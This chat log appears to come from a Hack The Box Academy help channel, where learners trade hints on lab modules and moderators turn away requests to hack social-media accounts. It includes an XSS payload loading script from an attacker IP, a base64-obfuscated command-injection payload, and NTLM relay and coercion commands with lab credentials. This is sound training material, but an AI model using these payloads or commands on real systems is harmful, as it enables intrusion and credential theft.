#modules
it worked @cloud urchin with the rockyou.txt file
Glad
To know
Glad it worked. Just as a FYI it's easier to transfer the hash (because it's like one line) to where the wordlist computer is and just crack it there.
@cloud urchin your reaction was faster than the speed of light
@cloud urchin you are studying for next certification? Or on a break?
on break
What are you doing next? Cape?
thats what i've done, its just that i have to wait some time between generating the target w11 and RDPing to it or else i have a connection issue
hi, someone can help me in XSS hijacking
Thats not a connection issue, thats because your RDP computer is connected to both PCs.. your kali vm and the internal one... so it can talk to both
But your kali vm can only talk to rdp
And that one pc can only talk to rdp pc
So we are using RDP as a middle man
So convey our conversation with that internal pc
i prove all the payloads and nothing :)
Thats the error i get, i didnt know it was because of that but thank you for the knowledge
```
$ xfreerdp /u:eagle\bob /p:Slavi123 /v:10.129.204.151 /dynamic-resolution
[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[15:36:55:453] [9815:9816] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[15:36:56:654] [9815:9816] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E] from server
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_NO_LOGON_SERVERS [0xC000005E]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[15:36:56:654] [9815:9816] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
Try with " instead of '
lol no way. CAPE is pretty hard. maybe after more studying. probably going for cbbh next.
You are in clg right now?
clg?
But this ip should be reached by your kali
College
oh, no
hemm, how? 
never went to college
👀
"><script src=http://IP:8080/script.js></script>
if by "your kali" you mean "your Pwnbox" then yes thats the case
Yes
You are working right now?
yes. best to move the convo to general though. although i'm off break going back to work now.
it works!, can you explain me why pls
since you are talking certs, i'm curious, have you ever seen the "security certification roadmap" ? (https://pauljerimy.com/security-certification-roadmap/) do you think it has some accuracy ? I do not know how the author ranked the certifications tho
Yup okie
I've seen it. I really don't know about some of those certs, but he put CPTS below OSCP and PNPT which makes me question if he knows what he's talking about because CPTS is above both, easily.
😂
i only have CEH and CISSP so my knowledge is limited
Cpts is better than oscp and pnpt
Its superior
its just a diff payload depends what is happening behind the scenes
"> is just closing an existing attribute so just depends whether they used ' or " you have to close it with the same one
if that makes sense
feels like its price based (more expensive go up) but there are some exceptions. At least on the GRC side i know that CISSP is usually the highest thing one can be asked for when working in cybersecurity (that or any SANS certification, its the filter used by most HR)
So this error is not what i am trying to explain
thanks you so much bro
If I am doing AEN blind...within how much time should AEN be completed...so you have an idea about your preparation
Idk I wouldn't think about it that way, just that if you can do the whole thing without looking at the module at all then you're most likely comfortable with the material and will be comfortable with the exam
I'm stuck on the last question of the Kerberos attacks skills assessment. "The hint is If a user logs in, we can steal their identity." I've successfully done this but I can't do anything with the user. A nudge would be greatly appreciated.
If you have done this, you should be able to read the flag right?
hey i need help
broke into mine a bunch of times by clicking the "i forgot my password" button, then following the procedure
alzheimer is hitting sooner than expected 🙁
Hi
yeah that wont work i lost my acc 6 years ago
and i dont have access to anything email phone number nothing
contact support ?
You need a hacker
how do i find one im scared to get scammed
Yo have to pay for them
yeah thats not a problem but where do i find one
Try to find one in here
which type of witchcraft do you think people here can do that they get access to an account that you dont have a email, phone number or @ ?
@nova void We do not condone illegal activity in this server.
sorry i was just asking
telepathy ?
sybau
Contact instagram, that is your only recourse. Anyone telling you otherwise is scamming you.
Thats it
Greetings Everyone! I'm doing the Intro to Networks module and there're two questions I know I'm answering right but it's telling me otherwise. Has this happened before?
what a boomer feeling to have to google a word to find out its a new "young people expression" 😢
if the system is not accepting the answer, it's because it's wrong
I suggest reading the module again. Most of the time, it's a little detail that you're missing.
I have. Answer matches word for word. Questions 1 and 3. Which imo are the two simplest answers in the bunch.
Hi there! Is there a problem on the target VMs ? It's been 15min spawning now
have you tried changing the VPN ?
anyone can help me please? I dont know why I get this error
hello everyone i am currently in the footprinting module at dns and i don't understand what to answer on the question ?
This may have worked already. If you look at the example provided in the material, it's the same as your output
If you don't see anything in ntlmrelayx, then maybe there's something wrong
Please refrain from posting content from modules above Tier 0. You can shape this in a question that doesn't spoil content though.
Have you updated your hosts file?
yes
Go ahead and DM your screenshot and some information and I'll see if anything sticks out.
Hi.... please I'm trying to install knock subdomain on and I'm running into some issues. I have no idea what I'm doing
I'd appreciate it if anyone could be of assistance. Thank you
What htb academy module is this related to?
hey is there anyone that can maybe give me an extra resource for the footprinting dns module
i have read the entire section but still struggling with the exercises at the bottom
My apologies. This is not related to any module. I've tried checking online for a solution but nothing seems to be working and I don't understand why.
I just thought I could find some help here
Then this isnt the right channel to ask in. This channel is for help with https://academy.hackthebox.com modules. I suggest reading #welcome to see what the whole server is about. You should be able to post in #1024429874246590575
Alright thank you. Again my apologies
All the commands you need to solve the questions are already mentioned in the material
Yes I know but I seem to run into a problem with the first question I don’t get a answer but also no error
The second I did however find so it is kind of strange
Well. Sometimes you gotta dig a little deeper for records
Regarding the first question, you are interacting with the DNS server, and the question is asking you the FQDN for it. It may be clearer if I phrase it that way
Oh okay thanks for the help I will continue tomorrow
Thanks for the help people
Password Attacks Pass the Certificate
I am receiving this error when using gettgtpkinit.py ?
Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
have you Googled the error?
This message from the Kerberos authentication server appears if the difference in system time between the LDAP and IWSVA servers is too large (more than three or four minutes).
correct
and how do you fix that?
this goes back to how kerberos works
Your answer or what you have to do, relies on this: *"The clock skew is too great"
right Kerberos uses the timestamp as part of its method to issue tickets
Faketime utility can be used to spoof, but how to use with gettgtpkinit?
adjust the clock
On Kali
you can do that with tools, or manually
Again, if you Google the error, it will bring you to the same folks who face that issue and the tools they used
```
timedatectl set-ntp off
rdate -n [IP of Target]
```
Hello
Guess not lol
@vague ruin deleted your messages because they appeared wholly unrelated to the channel and just flooded it with nonsense
Does anyone know if I can use the app from my mobile or if it is exclusive to PC?
You can use the academy on mobile, and it works fine. just not optimal imo
@fathom pendant how ??
So just a heads up. I was asking this question based on working on my phone. I went to my laptop and put the same answers in and they were accepted as correct.
you didn't provide any context as to what academy module you are working on;
I really miss the MD cheatsheet , easy to read
short answer: just use nxc it's literally the same as cme
also i consider not sharing screenshots that could contain credentials; always redact
especially since it's above tier 0
this is of course an interesting idea, but I would like to know what doesn't work) next time it might not work nxc in the same way
crackmapexec is no longer maintained, so there's very little reason to use it. NXC is the same tool maintained by the people that were responsible for crackmap's maintenance. They had a falling out with the CME repo owner (to put it politely)
there is a hash, not credentials..
wow, I didn't know
i believe they're planning on eventually renaming the module
it's just not a priority in the pipeline
works great, why change anything) recognizable and short name)
well renaming the module to reference the tool netexec instead of crackmapexec
aaaaaah, I see what you meant. great, in that case the question is closed) everything works fine with NetExec
thanks)
think i have to send a msg in here
What have you tried so far and what is your concern regarding the exercise question?
Ok but finding the answer from the example was not the way to go.
Verified answer w current wordlist - just would have taken a while
I'm stuck on the Password stuffing section of the password attacks module. I already looked through all cnf files in /ect/mysql, didn't find a single thing. Also tried stuffing the sql server with default credentials from defaultcreds. Please give me some help.
default creds should work; first step should be to ssh into the server
syntax:
mysql -u <username> -p
[enter the password after prompted]
or
mysql -u <username> -p<password>
[note there's no space after -p, this is intentional]
Password Attacks Pass the Certificate
Getting Certificate ID when running ntlmrelayx but it is not writing to a file and has multiple errors lines 1043,42,82,113,68
nvm gpt fixed it
one of those is indeed correct; as i said. the first step is ssh into the system first with the given credentials
Do you mean sshing as root?
no
mb misread
yes, done that
@small scroll please take care not to post content from modules above tier 0.
where do i ask them then?
sigh
i don't recall changing too much from the example command aside from the ips
¯_(ツ)_/¯
make sure the target didn't die as well
whats the difference between having space after -p and not having space?
Hey Everyone, working on the Password Attacks module Attacking Windows Credential Manager exercise. I can switch to mcharles and found the Administrator password and can open CMD as Admin, but I don't see mimikatz or any of the other tools from the section. What am I missing?
the space makes mysql think the text you input is the database name
this is evident by the error
you'll need to transfer them over
Gotcha
oh, ty
with rdp targets i like adding /drive:/some/path/to/share,linux it gets mounted on the remote system under the share \\tsclient\linux
Thank you
@junior flicker got it solved? :)
Not yet, I'm just getting back into HTB, so clearing out the cobwebs, but I'll be good, I know how to move the files over, just didn't expect that I would have to
guys do I do the skills assessment tonight or tomorrow morn
sorry meant to at someone else @junior flicker 😓
all good?
No worries 😀
i mean if you wanna do it with a fresh mind or with stuff fresh on your mind. Also depends how frustrated or tired you already are and if you feel you need a break anyway
@fathom pendant why delete my msg
- spoiler text does nothing
- it revealed potential stuff about f1
OK!, u can help me ?
some things may be hidden in plain sight
there has to be space between -u and <username> right? I tried the default passwords and the given password on multiple accounts. Access denied.
I try to open my eyes wide...
I spawned a fresh target; ssh as sam; tried the correct pair of creds -> logged in
i suggest getting back to the first user and looking from there
we are talking about mysql right
yes
[that warning is telling me that using password on the command line is insecure]
did you use sam as the username?
congrats
no; i used the associated username with the password in the default cred database
the database (cli tool) gives you
service | username | password
uh, what default database?
the default cred cheatsheet database
you shared its output earlier
(it got yeeted bc the module is above t0)
it's a small list so at least it's simple :D
i thought i had to use the users on the machine
ty
how to do
@vernal jacinth this isn't that kind of server and that link requires someone to be logged in to facebook to view
Sorry this server isn't for random links to fb.
any option
not sure what you need help with because I didn't open the fb link. But this isn't a hacker for hire server, or a server to look for anything illegal
Are you asking,
"Will they teach about hacking on this server?"
that's not what i'm asking, is that what you're asking?
if so, then yes we do teach about legal hacking, not hacking into stuff like facebook or instagram or none of that nonsense
"Like doing it on Facebook and Instagram, right?"
no
i explicitly stated NOT hacking facebook or instagram
if that's what you're interested in doing, then this server isn't for you.
There aren’t any websites to hack Facebook and Instagram, right?

#rules message rule 4. Keep it legal
Hey guys, just bought the vip for a month any roadmap or machines you recommend how can I make the best use of this
complete the paths that interest you the most
are you talking about vip related to https://app.hackthebox.com ? if so i'd make use of retired machines and writeups to learn what you can about the various things that may interest you. [as there's no vip for https://academy.hackthebox.com.]
Just finished my Masters degree in Cyber, decided to hop into HTB this will be fun
also connect your htb account via the instructions in #welcome ; i also recommend giving this a read before just jumping straight to writeups https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups
guys is this normal? why do i got 0 cube for few questions?
Each question shows you how many cubes you will get back.
its not some kind of limits on how much i could get or something then?? im using student subcription btw
No it's not a limit, it's just an arbitrary amount of cubes placed on each question which add up to be the cube refund mentioned in the module
ohh okay thanks
You get 20% of the cubes back from the cost of a module.
So if a module costs 100 cubes, you get 20 cubes back
Except tier 0. Which is 100%
Yeah sign up for hacker1 🤣🤣
jesus christ what is this image quality of this module.
there a tool to depixel images try that maybe 
lol
submit this to #1234357888114364508 (it's not just you)
Nice
you picked the wrong server my fren ~ big smoke
@granite vector this server isn't for finding out how to hack your ex's instagram. (if you want to know what this server is about feel free to read #welcome) but tl;dr you're not gonna learn how to do illegal shit here.
If you wanna learn hacking in a way that won't get you in legal trouble you're more than welcome to sign up for a hackthebox account https://hackthebox.com and start your journey there.
You can also link your account to the discord in order to see what else this server has to offer
@granite vector as stated by @autumn pilot this is something for the authorities, this server isn't a hacker for hire server. At best it's more appropriate to find a Private Investigator in your area to help.
I understand thank you
on an unrelated note;
redoing the password attacks skill assessment and LMAO i completely missed the plaintext creds in the output
blindness
Hi,
I’m trying the File Upload Attacks assessment and I’m stuck. I can upload files and see them in the upload folder, but my PHP never runs. I tried tricks like (valid) double extensions. and also adding PHP after a valid image, but the code still just shows up as text. Maybe I’m missing something basic? Any small hint would help a lot.
Thanks!
https://academy.hackthebox.com/module/147/section/1335 I need help, impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs --template 'EFS' -smb2support I used this command and then used python3 /usr/lib/python3/dist-packages/nxc/modules/coerce_plus.py --listener 10.10.16.42 INLANEFREIGHT.LOCAL\\wwhite:'package5shores_topher1'@10.129.217.242 but there is no output
Hello
there's not gonna be output until you tell something to attempt to connect to it. ntlmrelayx acts as a middleman
also i suggest using the template provided by the module
and the other stuff mentioned in the module, it'll make your life way easier
could someone help me in "privileged access" module in active directory enumeration and attacks
I reused the module's impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs -smb2support --template User and then used python3 /usr/lib/python3/dist-packages/nxc/modules/printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.217.242 10.10.16.42, but still no output.
I'm not sure how to fill in the "--template" value, but I did some research and it told me to select "enable=true" and "Enrollment Rights": [
"INLANEFREIGHT.LOCAL\Domain Admins",
"INLANEFREIGHT.LOCAL\Domain Users",
"INLANEFREIGHT.LOCAL\Enterprise Admins"
]
ask your query please
That's not the template referenced in the reading
you fill out the --template option with a valid template, you can discover templates with certipy
if you want to know what to look for with it; but again -- we are already given the information about which template to use by the reading
in this question "What other user in the domain has CanPSRemote rights to a host?" i got the user, b-----. Then for the next ques "What host can this user access via WinRM? (just the computer name)". i found a computer object's full sid which i resolved using "Get-ADComputer -Filter { ObjectSID -eq $sid } | Select-Object Name". but it turns out to be wrong answer
it's asking for just the hostname such as Academy-EA-Attack01
not Academy-EA-Attack01.inlanefreight.local
yea i entered that ACADEMY-EA-XXXX
wait I'll, try again just to be sure
Can someone here help me?
I used this impacket-ntlmrelayx -t http://10.129.217.242/certsrv/certfnsh.asp --adcs -smb2support --template "KerberosAuthentication" and python3 /usr/lib/python3/dist-packages/nxc/modules/printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.217.242 10.10.16.42 but still no output
make sure you're asking the dc01 for the callback, not the crtsrv
it is not the answer
privileged access
yep that is 100% not the right answer, look for other machines
i ran sharphound on the academy machine and transferred the result and ran bloodhound on my VM, does this method work?
Any one know a fix for the machine.htb now showing up on the website despite of adding in /etc/hosts and stuff?
yes, should work
Make sure to use the compatible version of sharphound as listed in the bloodhound-ce collectors if you're using the community edition
Hi,
I’ve asked the same question about the File Upload Attacks assessment twice in the last 24 hours and I haven’t received any answer. I am stuck and I just need a small hint to move forward. Could someone please take a moment to give me some guidance? Thanks.
not all php extensions are created equal
my notes state i had to do some experimentation to find the appropriate one
(god i love canvas lol)
i also noted (used an existing file image to craft a malicious file)
it should; the associated cypher query should display the machine
Weird i tried that for almost an hour and it didn't work, even the queries given in the module weren't working, now i ran bloodhound on the academy it got solved in 5 min
Can you be more specific? I tried for a while but still got no output.
you are given two ips
one is for the certificate/key server, the other is for the dc
Thanks. I did identify the PHP extension you mentioned, and I also tried by taking a normal image and adding PHP code inside it. The file uploads fine, but when I access it the PHP is never interpreted — it just shows up as plain text.
hello
you'll have to experiment a bit
a successful upload doesn't automatically mean it's going to execute
if you used burpsuite i'd look through the list of successful uploads (filter by size when looking at the requests)
@shell prawn be careful not to share answers in your screenshots
Okay
Actually I am a newbie and I've spent about 2 hours on this question trying different prompts but I can't seem to find the correct answer
Thanks for taking the time to reply, but honestly your answer feels a bit esoteric to me.
I understand (and painfully experimented 🙂 ) that a successful upload doesn’t always mean execution, but I’m not sure what exactly I should be looking for in Burp when you say “filter by size.” Could you clarify a bit more what you mean?
burpsuite shows you the responses to the list attack
at the top bar you have the different columns, if you click it'll sort in ascending (or descending) size
This worked for me, I changed the original command and still got no output
10.129.217.242 (ACADEMY-PWATTCK-PTCDC01) ,10.129.142.171 (ACADEMY-PWATTCK-PTCCA01)
Hello I am in password attacks, in the pass the ticket attacks from windows module, but I struggle. It says pass the ticket for user John but when I use mimikatz I don’t capture ticket for user John
try resetting the target; also with rubeus you can specify a user
rubeus dump /user:john if it doesn't exist then reset target
I realize now how valuable your hint was. Thanks a lot! 💪
looks like service account vs non-service
@quartz sundial careful of spoiling info for modules above tier 0 btw
I drew over all confidential data like passes or hashes)
no disclosure)
even responses to queries can be telling
If it will be legitimate, if I blur images/commands?
Hi there, on module Command Injection, Advanced Command Obfuscation. I can't figure out how to get the command to work. Stuck for a day now. I used Base64 encoding, but nothing seems to work. Can anyone help me please?
```
echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64
ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=
ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
```
Hey guys i need some help on the the advanced xss and csrf exploitation module skills assessment, i managed to become a moderator but am stuck in trying to get a working xss payload via the file upload functionality and task management, i get blocked everytime by CSP..Kindly assist..
https://academy.hackthebox.com/module/67/section/605
how to do this section Print Operators of module Windows Privilege Escalation, its giving so many errors, i am stuck on it for 2-3 days. 🥲 can u provide ur notes of this section Print Operators or how u did it.
whats the issue?
32 not working and when try to use 61 it saying to enter id:pass . that should not happen i guess , even i enter id pass it show product key activation error.
anyone knows how to do it ?

tbh, I didn't use the akagi64.exe for this. The module suggests you load a vulnerable driver and use a different tool for gaining a privileged shell
if you load the vulnerable driver, the suggested tool should suffice
I guess its called exploitCapCom
not working ?
still error
SeLoadDriverPrivilege Failed not there
You will need to bypass UAC
with akagi64.exe ?
the module suggests using UACMe
and i don't recommend using tools not suggested by the module. this will only cause headache
https://github.com/hfiref0x/UACME this one ?
yeah
also delete your videos and try not to use them as it contains spoiler commands
done
in this repo akagi64.exe there nothing else
@tired flax heyy did you find a solution im stuck and need some help
Everything you need should be in C:\Tools unless you have already done it that way and are working on compiling and uploading them on your own.
Send me a DM telling me what you tried.
Guys I need help, the Pivoting and Tunneling module, skills assessment part. I'm unable to pivot using proxychains, whenever I bg the shell from the webserver and then try to use proxychains, it keeps dying. Any tips to keep it running and achieve pivoting?
does anyone know why nmap is taking so many time?
Do a -v and it will be verbose and show you how long it will take
it is stopped as you see in my screenshot, no output shown
Can you ping it
it's still working
press any button - it will display progress
if you press any key it displays progress
7 minutes? is it possible?
yes
i'll try
ctrl + l should show your scan progress
in these cases i heavily suggest adding -sT to the command
Try sU lol that will be like 10hrs
@tribal lark
pressing any key shows progress, no need for key combos
it works, really really slow
i default to the right arrow key
Ctrl + c is the better one 🤣
If you have everything configured correctly and it is not working, try a different method from the module. If you exhaust all of the methods that will work with what you have available for pivoting, I recommend taking some time to learn how to configure and use ligolo for pivoting.
I guess printerbug is not working properly
So I would either download printerbug.py or you can try using the netexec module for funsies:
```
[*] coerce_plus module options:
LISTENER LISTENER for exploitation (default: 127.0.0.1)
ALWAYS Always continue to all exploit (default: False)
METHOD Exploit method (Petitpotam, DFSCoerce, ShadowCoerce, Printerbug, MSEven, All default: All)
M Alias for METHOD
L Alias for LISTENER
```
Also deleting this due to it spoiling content over Tier 0
@gray yacht @opal shuttle Thank you, it is indeed a problem with printerbug.py
https://academy.hackthebox.com/module/77/section/851
I cant seem to find the admin page mentioned in the lesson
It mentions it in the README portion, but im not seeing it, Or im missing it
Am i the only one who comes across unstable machines for offensive module issues? For exmpl, on shell&payloads, the machines are up and then end up not responding, barely an nmap later.
no you are not the only one. hackthebox has many machines which have bugs
I just have the issue of HTB constantly setting off my antivirus lol
http://ip/nibbleblog/admin
Hello, the user and password list for the Attacking Common Services --> Email Services does not work, provided in the resources?
Add your notes folder to exceptions
Okay, ill try thank you
I dont recall it not working
Well, apparently it doesn't work for user enumeration of the domain specified in the task
Thank you, Could not see it in my README scan XD
Or at least I believe so, because there's only one command mentioned for that
did you add the -D domain?
yes
Ah, nvm, I got it, there was a small typo
a hacker's biggest weakness... spleling
righgt
This led me to an index page not the login portal, did I miss something else?
try admin.php 😉
I think one time I put inlanefright.htb
This question came to my mind after working with captive portal modules:
My captive portal shows my MAC/IP (192.168.101.135) and traffic stats (1136.6 MB up / 4.1 GB down). But I've seen claims that captive portal traffic numbers don't reflect real client consumption.
How is this possible? If the portal tracks my specific device, shouldn't the upload/ download numbers be accurate?
What technical reasons could cause captive portal statistics to be inflated or inaccurate compared to actual internet usage?
traffic can be measured by the router, and not your device. aside from that not sure other technical stuff (also that wouldn't be your MAC address)
Hey Guys,
i'm stuck on File Upload Module.. have upload a webshell with shell.php/.jpg, but cant it at /profile_images/shell.php/.jpg?cmd=id and /profile_images/.jpg?cmd=id too... i found in /.jpg?cmd=id just encrypted things, no result ...can anyone help me? when its not allowed to post the result then pm me pls
Hello.
Would appreciate a nudge on what's wrong with my payload on Advanced Deserialization Attacks: JSON 
null bytes and weird extension stuff is a pain
yeah its weird 😄
i suggest trying something else
but burp intruder says successfully, so anywhere it must be
need it maybe for cbbh exam..
just because it's successful, doesn't mean it's useful
thats right.. but it doesn't help me
😄
there is a double extension
Captive portal shows traffic counted by router (firewall rule, or before NAT), but it is different from the Wireshark that I measured on the client.
not sure the relevance though to a module? got a link to the module/section you're working on? ¯_(ツ)_/¯
Directly not relevant, but I need to know if there might be an attack vector in a captive portal that we can use to reset our traffic.
Module: File Inclusion
Lesson: PHP wrappers
Question: Try to gain RCE using one of the PHP wrappers and read the flag at /
After I check PHP configurations, and encode the PHP web shell to base64, I'm a bit lost as to what comes next. I'm trying to use this command: curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
A little nudge?
use a different wrapper; expect isn't enabled
got the flag, thanks
is there separate channel for pro labs
hi guys , how r you ?
in my browser i cant find storage unit in devtools
how can i see ?
Yes #1263635449335910531 and if you don't have access follow the steps in #welcome , read over #rules, and check out #faq.
I am on the Nessus vuln scanning module. I have connected to the target via ssh, but when I use dpkg, it says it's not found. Am I supposed to do this a different way?
Oh ok nevermind I tried something ippsec usually does and it somehow worked, binge watching his vids has helped me again
Hi chat, how does one gains access to the off topic rooms ?
Follow the instructions in #welcome
i did the verification already. Isnt that what the green mark next to my name stands for ?
never mind, i only leaked my token...
now its done
Hi everyone im having trouble connecting to target machine using ssh, it always returns an error message saying "Connection closed by <ip> port 22". what can i do to resolve this issue?
You must not be connected to the VPN
Download it and use “sudo openvpn <name.ovpn>” then try
or if you're using Kali, you can import it as an openvpn connection profile. Thats what I did
Hi everyone. Having some issues with the Linux Privilege Escalation module, wondered if anyone could help?
I'm on the capabilities section. Every time I try to SSH in, I either get no response, or if I do manage to login my SSH window will lock up after about 10 seconds
This is happening both on PWNbox and on my own lab machine
Could anyone else confirm if it is happening to them as well, or if it's just something on my end
I had the same issue. I had to reset the machine 3 or 4 times to make it work
I've restarted it about 10 times by now
did you make sure you're trying to change the right capability?
it returns the same issue even when connected to the vpn too
I can't even start changing any capabilities before the window locks up. it's an SSH connection issue I'm having trouble with
you may have to raise a trouble ticket if its happening as soon you connect. that shouldnt be happening
Not even a "host unreachable" response
Just no response at all
when they do come through the ping time is all over the place
maybe their network on that segment is overloaded
Perhaps. I tried last night and Im trying again now, and its the exact same issue
seems pretty consistent
maybe try a lower utilized vpn server, just remember you will have to download a new vpn connection profile to your local box
ah, then maybe raise a trouble ticket so they are aware
Will do. thanks for your help, it's been driving me crazy
Ive ran into a few boxes where I just had to keep restarting them, Ive never used the PWNbox though
Yep, same issue with DE pwnbox that UK had. Must be an issue on their end
I'll raise a ticket
What interests you? Do you have any prior knowledge?
Hi, I'm trying to send a file from the target machine back to attack machine but I'm getting connection time out. Not sure what I'm doing wrong. Need some help ty
Did you just buy 5000 cubes outright?
Interesting choice
I mean nothing just that if you buy them monthly it’s $340 basically instead of $500
any help?
If you’re using xfreerdp to get into the machine just attach a folder as a drive and move it that way
yeah, but I want to figure out how to do it scp way
maybe machine has something against port 22
dumb question (but it happened to me), is the target there ?
I had some downloads getting stalled issues myself with scp. Can you try TCP VPN in case you’re not on one already?
ladies and gents i have been stuck in ts for a good hour, any nudges please i used lazagne.exe it only viewed the Ubuntu login thingy, yet the answer is wrong
I officially hate windows
Why limit yourself to LaZagne?
well i used the findstr as well, but it returned jack shit. If you have anything better by all means im happy to know
hi everyone i was just going through the Wi-Fi Password Cracking Techniques module and one of the questions ask me to use the OneRuleToRuleThemStill rule. first its not inside the rules directory or the current directory second when i want to copy the rule from github and paste it it just wont paste it and yes im in root anyone had such a problem? https://academy.hackthebox.com/module/312/section/3723
I believe all the tools/rules are in /opt
Guys hello am new in htb can someone pls help me how to connect to this cause i dont really know ty
Hello ! I am in password attacks in the pass the ticket from Linux chapter and I have a question about the last exercise (I mean the last mandatory one ) . Let’s say I have access to /etc/krb5.keytab . How can I impersonate a user ? Also how can I know who are the possible users I can impersonate ?
If you have a user's ticket, you can impersonate them
But how ? I don’t understand the use of krb5.keytab
It does not work with the usual way of exporting it in the env variable
Whats that thats a server layout ?
Its the welcome channel
It gives all kind of information about the server, and even instructions to link your htb account to the server
The keytab is a key file, essentially, also iirc its initialized with kinit
iirc? So if I have access to a file I can impersonate anything inside it ?
How can I know all the possible users I can impersonate ?
Iirc -> if I recall correctly
The keytab file is for a specific user
Only for one user ? How can I know which one ? I mean his exact username ?
I believe the module goes over how to enumerate a keytab file
And dig into its principal info
No this file it’s different from the others
Reread the "abusing keytab files" subsection from the reading, it explains all to do
Hi guys, new to HTB. I've been working with Intro to Network Traffic Analysis and the question is asking to use 'tcpdump' to save the file. I wrote it in the command line to save the file but it's been nearly an hour and it's still going...am I doing something wrong?
Well youre not gonna get much traffic to it...
Also you didnt specify the length so it'll capture until you tell it to stop
Password Attacks (Skills Assessment - Password Attacks)
Tips on pivoting to other internal machines after getting into the DMZ?
Ive tried establishing the SOCKS proxy to reach internal IPs but dont have proxychains
Does proxychains need to be moved to the machine? or is there another way?
I've also found creds for a user on an internal machine just cant reach it yet
Proxychains is only required on the host machine. Chisel server stuff is for the dmz host to connect back to you, then you use proxychains to do stuff from there. Alternatively look into ligolo-ng
when will we get the season 8 prizes?
It can take up to a few weeks to dole out all the prizes, I suggest reaching out to support for a better timeline (also unrelated to academy modules)
oh, sorry thought I'm typing in general
ligolo is so much better, why wasn't it mentioned in the module, I assume it gets covered deeper in Pivoting, Tunneling module?
not really, the tool came out well after the module was published
I see
if you have an annual sub, the writeup author actually uses ligolo for this
I do indeed have the annual sub I just try to avoid looking at the writeup when i can
Ill allow it this time tho 
i just more meant if you wanna dig into alternative methods or thoughts of doing it
it's doable with stuff like proxychains and chisel
does academy use community content, Like if I was to make a sweet guide on Ligolo would they use it in a module?
they generally don't use community content unless it's a script
they may add ligolo to the pivoting module, worth throwing a /feedback for it
I'll do that, is there a channel here that i could throw a ligolo guide into whenever I make it ?
Hello there, I'm solving the Intro to C2 Operations with Sliver module and I've been digging into the last question but couldn't figure it out. If anyone can give me a hint or help me I will be glad
Finally completed Password attacks
is finishing these in 15 days a reasonable time line ?
That was the OG goal to have up to SQLmap done by september
instead of focusing on speed of completion, i'd focus on understanding of the material
Yeah that is the goal but to stay on schedule I was just wondering
I have plenty time I want to take CPTS in january
and november/december are currently dedicated to doing boxes for muscle memory
so I may need to push boxes to only december and use november to wrap up the last few modules
Hey bro, can I DM you on questions about the Skill Assessment?
The first 3 will take some time most likely and then next 5 are quicker, I mean you can mostly just look at the estimates they give they are roughly accurate.
Someone else made a post as well with the time they spent per module compared to the estimates which I thought was cool. https://www.brunorochamoura.com/posts/road-to-cpts/
yep
"The Password Attacks module was the big outlier, taking a whopping 144% more time than estimated. And that’s not counting the wait time during brute force attacks, which added even more. That module was a real drag."
Glad I am not the only one
Yep, same for me, took longer than the estimated time, everything else was roughly accurate or usually took less time
fun fact; the password attacks module used to be worse on the time wasting -- the recent update cut out a significant amount of waiting
for the section using the firefoxdecrypt tool... you first had to find kira... yeah.... it wasn't great
I'm having some trouble with the skills assessment for CME. I've tried rid-bruting and asreproasting the users. But I keep getting KDC_CLIENT_REVOKED. Then it just quits on me. Did anyone have the same error?
[Aug 14, 2025 - 22:37:24 (CDT)] exegol-default skillsassement # proxychains -q nxc ldap dc01.inlanefreight.local -u skusers.txt -p '' --asreproast skasreproast.out
LDAP 172.16.15.3 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:None) (channel binding:Never)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Does anyone know why I can only type here?
I can't even type in gen
Instructions are in #welcome to link your https://hackthebox.com account to the discord
Thank you
hey i am a complete beginner how do i start and from where
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hello I try to use zap replacer in module using web proxy but It doesn't work, I don't understand what is the reason?
anyone ?
Hi, I am also stuck not being able to access www.inlanefreight.com. ping 8.8.8.8 works fine, but can't curl www.google.com. Are you referring to our own VPN or the pwnbox vpn? Disconnecting my own VPN doesn't change anything, and I couldn't find any VPN settings on the pwnbox. A bit lost with my newbie skills here, any pointers where to look?
You should be able to access www.inlanefreight.com without a VPN as it is a public domain. Here I'm talking about HTB's vpn and that it shouldn't be used alongside the pwnbox because they use the same network and ip and thus can cause connection problems.
If you can't connect to any website at all I'd check your network settings, although I do believe that the pwnbox has a limited internet connection
I can access www.inlanefreight.com from my own browser, but not from within HTB.
what do you mean not from within HTB ?
pardon my wording, it's still confusing at times: I open what I assume is a VM from within the academy, with Desktop, terminal, and firefox browser. From that firefox browser, internet is not accessible, at least inlanefreight.com
Are you referring to the pwnbox perhaps? Yeah I mentioned that that has limited internet connection
yes, the pwnbox you have access to for 120 minutes. not using their internet at all, just now for solving the exercise. I mean that amount of internet connecting should be granted, no?
It's not that it doesn't have access to the internet, it can only access very specific sites for security reasons
